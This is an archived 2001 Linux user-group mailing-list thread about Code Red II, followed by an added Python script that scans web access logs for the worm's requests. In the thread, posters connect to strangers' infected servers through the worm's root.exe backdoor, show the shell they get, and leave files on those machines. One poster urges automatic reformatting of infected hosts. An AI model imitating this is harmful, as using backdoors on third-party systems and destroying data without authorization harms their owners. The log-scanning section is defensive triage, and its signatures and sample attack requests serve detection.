Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx).
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 23 Aug 2001 22:34:30 GMT
Content-Type: application/octet-stream

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>cd \

-- Then nothing. I reconnected, got the exact same results. The command "DIR" doesn't work either. Perhaps I'm grossly misunderstanding something, but it doesn't seem like it's actually compromised - nothing will run. I don't think the machine is greatly overloaded either, given how rapidly it responds to an attempt to reconnect. Or perhaps there is some new toolkit out there that is killing processes named root.exe. It's hard to say.

That one particular box attempted to install Code Red on my own machine several times. Perhaps someone should write a script that examines logs and then automatically euthanizes any Code Red box with a full reformat. While this may seem harsh, keep in mind said box is currently infecting anything else it can - if people can lose their freedom and property for this "crime", then surely reformatting is a just response to a device doing so, particularly if it stops said action. If a car was running over children in a parking lot, out of control all "Christine" like, no one would be too upset if someone rolled over it with a tank.

That's what backups are for, right? You did make backups, didn't you? If they're using M$ products and aren't making backups, they deserve what's coming to them anyways. Fuck 'em if they can't take a joke anyways LOL.

Kim Allen wrote:
>
> I've been contacting the sites that my server logs show have been
> hitting me with the code red signature and so far no one has bothered to
> respond except for one. However that site has told me how secure they are
> and how there is no way that they have any problems.
> When I sent them the
> portions of my server logs showing they do have a problem they threaten
> legal action. Has anyone else had this type of response?
>
> > To answer your question... make sure you're hitting enter TWICE after
> > the command.
> >
> > As a security guy myself, I'm deeply troubled by what I'm finding.
> > Check it out:
> >
> > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > Trying xxx.xxx.xxx.xxx...
> > Connected to xxx.xxx.xxx.xxx.
> > Escape character is '^]'.
> > GET /scripts/root.exe HTTP/1.0
> >
> > HTTP/1.1 200 OK
> > Server: Microsoft-IIS/5.0
> > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > Content-Type: application/octet-stream
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-1999 Microsoft Corp.
> >
> > c:\inetpub\scripts>
> >
> > From here, I've been leaving a nice text file on \\ALL USERS\\ desktops
> > that explains how I did it, and why they need to pay attention to
> > security patches. :)
> >
> > Hopefully they won't take it the 'wrong' way.
> >
> > ~g~
> >
> > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > Wayne Conrad wrote:
> > > >
> > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > keep recreating the same data each time.
> > > >
> > > > Are you putting the IP's up too? Every one of the CRII infected boxes is
> > > > rooted... I wonder about the goodness of publishing a list of known rooted
> > > > boxes.
> > > >
> > > > Wayne
> > > ________________________________________________
> > >
> > > I've been trying that out
> > >
> > > telnet ipaddress_from_my_httpd_access_log 80
> > >
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > but I can't get a command prompt - what am I missing?
> > >
> > > Craig
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

--
jkenner @ mindspring . com
I Support Linux: Working Together To Build A Better Future.
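Several people in this thread are reading their httpd access logs for the "code red signature" and then contacting the owners of the hosts that hit them. The script below is an added example of that log triage step; it is not code from anyone on the list. It assumes an NCSA common log format access log and matches two request shapes from my own knowledge of the worm: the overflow request against /default.ida (padded with "N" by the original Code Red and "X" by Code Red II) and requests for the root.exe backdoor that Code Red II leaves under /scripts and /MSADC, which is the same path the posters are probing. The log lines, addresses and timestamps in SAMPLE_LOG are constructed for the example, using documentation address ranges.

```python
import re
from collections import defaultdict

# Request patterns to look for in the access log (assumption: these two are
# what "the code red signature" means in this thread):
#  - the Code Red overflow against the .ida ISAPI extension: a long run of
#    padding ("N" for the original worm, "X" for Code Red II) in the query
#    string of /default.ida
#  - requests for the root.exe backdoor that Code Red II drops into /scripts
#    and /MSADC on an infected IIS host
SIGNATURES = {
    "code-red-ida-overflow": re.compile(r"^\S+ /default\.ida\?[NX]{20,}", re.IGNORECASE),
    "code-red-ii-root-exe": re.compile(r"^\S+ /(scripts|msadc)/root\.exe", re.IGNORECASE),
}

# NCSA common log format: host ident authuser [timestamp] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)


def classify_request(request):
    """Return the name of the signature matching an HTTP request line, or None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(request):
            return name
    return None


def scan_access_log(lines):
    """Group matching requests by source address: {ip: [(timestamp, signature), ...]}.

    Lines that are not in common log format are skipped rather than guessed at.
    """
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        sig = classify_request(m.group("req"))
        if sig:
            hits[m.group("host")].append((m.group("ts"), sig))
    return dict(hits)


def abuse_report(ip, events):
    """Plain-text evidence block to send to the contact for a scanning host."""
    header = f"Host {ip} sent {len(events)} Code Red related request(s) to this server:"
    body = [f"  {ts}  {sig}" for ts, sig in events]
    return "\n".join([header] + body)


# Constructed sample log lines (not from the thread). An Apache server is not
# affected by the .ida overflow, so the worm's requests are logged as 404s,
# but they still identify the infected hosts that sent them.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Aug/2001:14:02:11 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858=a HTTP/1.0" 404 276
192.0.2.10 - - [23/Aug/2001:14:02:13 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858=a HTTP/1.0" 404 276
198.51.100.7 - - [23/Aug/2001:15:11:40 -0700] "GET /scripts/root.exe HTTP/1.0" 404 284
203.0.113.5 - - [23/Aug/2001:15:12:01 -0700] "GET /index.html HTTP/1.1" 200 1043
this line is not in common log format and is ignored
"""

if __name__ == "__main__":
    for ip, events in sorted(scan_access_log(SAMPLE_LOG.splitlines()).items()):
        print(abuse_report(ip, events))
        print()
```

Run it against a real access log with `scan_access_log(open("/var/log/httpd/access_log"))`; the per-host report is the evidence block to attach when notifying a site, and the timestamps let the remote admin match it against their own logs. Because the signatures key on request shape rather than response code, the same scan works whether the local server is IIS or something that merely logged the attempt.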